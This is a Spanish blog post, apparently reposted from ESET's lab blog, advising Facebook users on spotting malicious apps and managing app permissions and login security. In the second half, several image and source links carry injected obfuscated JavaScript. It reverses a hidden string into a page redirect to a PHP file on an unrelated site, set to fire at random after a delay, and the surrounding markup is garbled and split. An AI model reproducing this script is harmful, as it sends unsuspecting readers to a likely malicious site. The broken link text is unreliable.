Detectando aplicaciones maliciosas en Facebook
El hecho de navegar en Internet sin las debidas precauciones es un riesgo inminente para contagiarse con algún tipo de código malicioso y Facebook no es la excepción. Por esta razón es importante que los usuarios tengan en cuentan algunas recomendaciones al momento de instalar aplicaciones en su perfil.
Contar con una solución de seguridad es la mejor opción para protegerse de la infección con malware, ya que aunque se tomen muchas precauciones mientras se navega en Internet la tendencia en la propagación y los ataques informáticos muestra técnicas como el drive-by-download, donde se descargan códigos maliciosos sin que el usuario lo autorice o se percate de que lo está haciendo.
Facebook, la principal red social en Latinoamérica, no es ajena al contenido malicioso. Los ciberdelincuentes aprovechan la plataforma de desarrollo que ofrece la red social para crear aplicaciones que buscan, en la mayoría de los casos, información sensible de los usuarios y en otros redireccionarlo a sitios web con contenido malicioso para infectar su dispositivo.
Cuando un usuario se conecta a un juego, una aplicación o un sitio web integrado Facebook proporciona los datos básicos del usuario, que incluyen el identificador de usuario, la información pública y los identificadores de la lista de amigos. Además es importante tener en cuenta que cuando se utiliza por primera vez una aplicación en Facebook, automáticamente la red social proporciona a la aplicación el idioma, el país y el rango de edad del usuario. Esta información sirve para que la aplicación pueda personalizar el contenido ofrecido al usuario y aplicar el concepto de red social. A continuación, puede observarse dicha característica:
Cuando una aplicación va a ser instalada en el perfil de un usuario y esta requiere algún tipo de comportamiento específico, Facebook le muestra al usuario un cuadro de diálogo donde le informa de los permisos solicitados. En la siguiente captura se observa el ejemplo de un permiso solicitado por una aplicación potencialmente peligrosa, que una vez instalada en el perfil de un usuario le muestra banners que lo redirigen a sitios maliciosos:
La opción de recibir notificaciones por correo electrónico de cuando se ha iniciado sesión de la cuenta desde dispositivos desconocidos, puede ser muy útil para que un usuario detecte si alguien ha accedido sin permiso a su perfil. Es importante destacar que el correo que recibe el usuario no le pide su clave de acceso u otra información sensible que permitiera un uso inadecuado del perfil del usuario:
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook![$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/wp-content/uploads/2013/02/Img1.png”>Ver imagen](http://blogs.eset-la.com/labora<script>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/uploads/2013/02/Img1-1.png”>Ver imagen</a></p>
<p>Sabiendo que tipo de información puede ser compartida por las aplicaciones en Facebook, es muy importante conocer las opciones que la red social ofrece a sus usuarios para que las administren. Desde la opción Aplicaciones se pueden ver los permisos concedidos a las aplicaciones, la última vez que la aplicación accedió a la información personal y la actividad publicada en nombre del usuario. Desde esta opción se pueden eliminar las aplicaciones que no se utilizan o desactivar alguna para que de esta forma no se proporcione el identificador de usuario.</p>
<p><a href=){kind=link}
![$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/wp-content/uploads/2013/02/2-1.png”>Ver imagen](http://blogs.eset-la.com/labora<script>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/uploads/2013/02/2.png”>Ver imagen </a></p>
<p>Además de tener la posibilidad de administrar las aplicaciones, Facebook ofrece en su Configuración de seguridad la opción de asignar un código de seguridad para cuando se accede a la cuenta de Facebook desde dispositivos no habituales, lo cual puede ser apropiado para prevenir la fuga de información en caso de que alguien obtenga acceso ilegal al perfil. También cuenta con la opción de asignar un código de seguridad diferente a la contraseña de acceso a la red social para aquellas aplicaciones que acceden al perfil.</p>
<p><a href=){kind=link}
![$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/2013/02/01/detectando-aplicaciones-maliciosas-facebook/”>Fuente](http://blogs.eset-la.com/labora<script>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/uploads/2013/02/3.png”>Ver imagen</a></p>
<p><a href=){kind=link}
Los comentarios están cerrados.